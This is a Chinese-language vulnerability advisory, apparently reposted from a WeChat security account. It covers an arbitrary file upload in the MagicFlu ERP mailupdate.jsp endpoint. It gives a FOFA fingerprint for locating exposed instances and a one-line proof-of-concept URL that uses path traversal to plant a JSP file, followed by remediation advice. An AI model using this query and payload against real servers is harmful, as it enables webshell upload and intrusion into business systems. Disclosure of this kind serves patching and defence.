一、漏洞简述
魔方网表ERP是一款高效、灵活的企业资源规划解决方案,旨在帮助企业实现数智化转型,消除信息孤岛,打造全程一体化的管理体系。魔方网表ERP拥有强大的表单功能和模块化的产品特点,魔方网表ERP能够无缝对接外部系统,打破信息壁垒,实现业务跨部门间并行协作,提高工作效率。魔方网表ERP还具有自定义审批流和报表分析功能,能够帮助企业实现业务流程的标准化、智能化,以及多维度数据分析,为管理决策提供有力支持。魔方网表mailupdate.jsp接口存在任意文件上传漏洞。
二、网络测绘
fofa:icon_hash="694014318"三、漏洞复现
四、漏洞检测poc
/magicflu/html/mail/mailupdate.jsp?messageid=/../../../test3.jsp&messagecontent=test123/magicflu/test3.jsp
五、漏洞修复
1、限制mailupdate接口的访问。
2、升级魔方网表ERP至最新版本。
3、官网下载最新补丁版本:https://www.mf999.com/erp.html
原文始发于微信公众号(实战安全研究):漏洞复现 | 魔方网表存在文件上传漏洞【附poc】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论